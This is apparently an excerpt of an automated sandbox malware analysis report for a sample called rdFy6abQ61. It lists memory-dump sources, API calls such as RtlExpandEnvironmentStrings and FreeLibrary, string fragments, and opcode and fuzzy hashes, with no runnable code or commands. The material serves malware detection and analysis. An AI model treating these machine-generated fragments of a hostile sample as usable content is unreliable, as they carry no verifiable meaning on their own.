                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$GetProcAddress.$l
                                                                              • API String ID: 0-2784972518
                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction ID: 9bf1a15524f93da5d415a352a70f6fdaaa80b869e271974596a4df611b68795a
                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                              • Instruction Fuzzy Hash: 133149B6900709DFDB11CF99C880AAEBBF6FF58324F14404AD442B7210D7B1EA85CBA4
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,-000000D5,00000000,00000000,?), ref: 020F7C78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: X2c0
                                                                              • API String ID: 237503144-1612431719
                                                                              • Opcode ID: 699e62a66c8bd060c75555ea85a6e323f78b4898e6ba044fdc3f12d6ed4cc69d
                                                                              • Instruction ID: d2b98de4fa96c588d2d2d0dcea0a7be6f1161913ef4a0597efc8aea63656d32d
                                                                              • Opcode Fuzzy Hash: 699e62a66c8bd060c75555ea85a6e323f78b4898e6ba044fdc3f12d6ed4cc69d
                                                                              • Instruction Fuzzy Hash: F0A121329483228BC364CF28C8903ABF7E1FFC4754F1A892DE9C59B661E7748945D786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$8
                                                                              • API String ID: 0-46163386
                                                                              • Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                                              • Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
                                                                              • Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                                                              • Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /B$nB
                                                                              • API String ID: 0-3787476056
                                                                              • Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                                              • Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
                                                                              • Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                                              • Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                                              • Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
                                                                              • Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                                              • Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !'$27
                                                                              • API String ID: 0-1982139352
                                                                              • Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                              • Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
                                                                              • Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                              • Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !'$27
                                                                              • API String ID: 0-1982139352
                                                                              • Opcode ID: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                              • Instruction ID: 44d9760ee0d7863342c421682168322dcebdeb2dbf1354964211a67a0877b8d0
                                                                              • Opcode Fuzzy Hash: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                              • Instruction Fuzzy Hash: 90C107B16883008BD7249F28CCD677BB7E2EF85324F19852CE9958B2D0E7B9D905C752
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >D$UUK
                                                                              • API String ID: 0-1347512165
                                                                              • Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                                              • Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
                                                                              • Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                                              • Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ji46$rYaT
                                                                              • API String ID: 0-3893754386
                                                                              • Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                                              • Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
                                                                              • Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                                              • Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =$^\
                                                                              • API String ID: 0-3808277151
                                                                              • Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                              • Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
                                                                              • Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                              • Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =$^\
                                                                              • API String ID: 0-3808277151
                                                                              • Opcode ID: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                              • Instruction ID: fb4b6a79ce1ba380699f90b954aceea14d5ebe82467c2e60bfa5748c24ebc7ab
                                                                              • Opcode Fuzzy Hash: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                              • Instruction Fuzzy Hash: 0EB107756483818BC729DF24C890BBBBBE1EFC5315F08896CD4D68BB81E7788845DB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                                              • Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
                                                                              • Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                                              • Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                                              • Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
                                                                              • Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                                              • Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                                              • Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
                                                                              • Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                                              • Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n$n
                                                                              • API String ID: 0-3874132673
                                                                              • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                              • Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
                                                                              • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                              • Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n$n
                                                                              • API String ID: 0-3874132673
                                                                              • Opcode ID: c4005c324171c5f74c8a629180dd734c5e49b29667f7da172a4492617f587dfd
                                                                              • Instruction ID: 349d14bf6d155dfdda7bbb8e43d020e9bf0430734ef7ef19330b06ba2a6990e6
                                                                              • Opcode Fuzzy Hash: c4005c324171c5f74c8a629180dd734c5e49b29667f7da172a4492617f587dfd
                                                                              • Instruction Fuzzy Hash: C0A1D576A097908FC764DB7884803AEBBD1AF85324F198A3DD9D9C77D1D6748841DB02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$gfff
                                                                              • API String ID: 0-3777064726
                                                                              • Opcode ID: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                                              • Instruction ID: 4941e5eadb7aba571cda7473ebd939308df881bd2ae5f083bfc9904c5215119c
                                                                              • Opcode Fuzzy Hash: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                                              • Instruction Fuzzy Hash: 7061F572A446118FE714CF29DC017ABB7E2EBC5314F09C62EE485DB392EB3898458B85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$gfff
                                                                              • API String ID: 0-3777064726
                                                                              • Opcode ID: 6c8c9fb26648e15531b3050723418642d5d2233e69bd9fa0fe755d291b7fc93a
                                                                              • Instruction ID: 1f530d28b8ac34838f09db58c3af5436e454046338050587086f4edd451c62e2
                                                                              • Opcode Fuzzy Hash: 6c8c9fb26648e15531b3050723418642d5d2233e69bd9fa0fe755d291b7fc93a
                                                                              • Instruction Fuzzy Hash: 7D6101726443418FE364CB28CC01B6BB7E6FBC5314F08C62DD595CB691E739840A8B81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *$*
                                                                              • API String ID: 0-899546507
                                                                              • Opcode ID: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                              • Instruction ID: f2dcfb4611cbd1373dcc29fbb8da402024d9acb2715ca0e647a2152ba3c04d44
                                                                              • Opcode Fuzzy Hash: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                              • Instruction Fuzzy Hash: 9151A0765083558FD718CF24D45035FBBE1EBC4308F018D2DE9EA9B280DBB899098BC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XY
                                                                              • API String ID: 0-554446067
                                                                              • Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                              • Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
                                                                              • Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                              • Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                              • Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
                                                                              • Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                              • Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6
                                                                              • API String ID: 0-498629140
                                                                              • Opcode ID: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                                              • Instruction ID: 787a559d3a6ca89598d2bb367016cd154da02af78fea546a06432564028693a7
                                                                              • Opcode Fuzzy Hash: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                                              • Instruction Fuzzy Hash: C3322CB0405B819FD351DF39C545793BFE0AB16214F188A9EE4E9CB383D236E146CBA6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                                              • Instruction ID: 5d6f820f76e102683b6000eea9d9c0854d2a53b51ca8dd83b48920ec6b395174
                                                                              • Opcode Fuzzy Hash: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                                              • Instruction Fuzzy Hash: 096111716083548FE720CF65D841BEFB7F0FB8A308F10856CE558AB282DB7554068B8A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NP,?
                                                                              • API String ID: 0-3110377521
                                                                              • Opcode ID: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                                              • Instruction ID: 1f4fb5fde5d3a5e7269753d163d491fe37fce05cbc84d157e3c3b696b68cf536
                                                                              • Opcode Fuzzy Hash: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                                              • Instruction Fuzzy Hash: 4CA148316052009BD714CF16CC81B6BB3A6FBC9314F14962DE9A5573C1D779AC06CB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NP,?
                                                                              • API String ID: 0-3110377521
                                                                              • Opcode ID: 1d2be2e89745f1705865aa58f38ac347d87ec7cac21ab51014cd6f937c8c9e72
                                                                              • Instruction ID: d3d272e107f8d6d532e655b1ca3129cc13b028ac259a873cfcfd5fd8ccf56ffe
                                                                              • Opcode Fuzzy Hash: 1d2be2e89745f1705865aa58f38ac347d87ec7cac21ab51014cd6f937c8c9e72
                                                                              • Instruction Fuzzy Hash: D0A105756842009FD728CF55CC81B6BB7A6FF85328F18863CEDA957291E731E805CB92
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0210AB5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 01e1882552020fdf3c56b2c86be107ff28e05b2961e87663747131647cbb6fdd
                                                                              • Instruction ID: 2aefa710d57c40bc4f5f307678554a53f96c962bd4bd22ee65321c404e65db03
                                                                              • Opcode Fuzzy Hash: 01e1882552020fdf3c56b2c86be107ff28e05b2961e87663747131647cbb6fdd
                                                                              • Instruction Fuzzy Hash: 034103726583154FD324CF68DDC134BBAE2ABC4704F1AC93DE5988B285DBB4C9058BC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "PA
                                                                              • API String ID: 0-2145937358
                                                                              • Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                              • Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
                                                                              • Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                              • Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0210BDFC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 33f1db717a145ff1562198e7d1e78c7b503345e90291f3797b6fdcaf95dce686
                                                                              • Instruction ID: 7c820c777e54af3c98aaf305338afcd05d863ce38f31e52e66c36897acfcfd8f
                                                                              • Opcode Fuzzy Hash: 33f1db717a145ff1562198e7d1e78c7b503345e90291f3797b6fdcaf95dce686
                                                                              • Instruction Fuzzy Hash: 7341E6B25593508FE314CF36C89074FFAE2FBC1704F168A1DE5951B395CBB995068B82
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                              • Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
                                                                              • Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                              • Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                              • Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
                                                                              • Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                              • Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86
                                                                              Strings
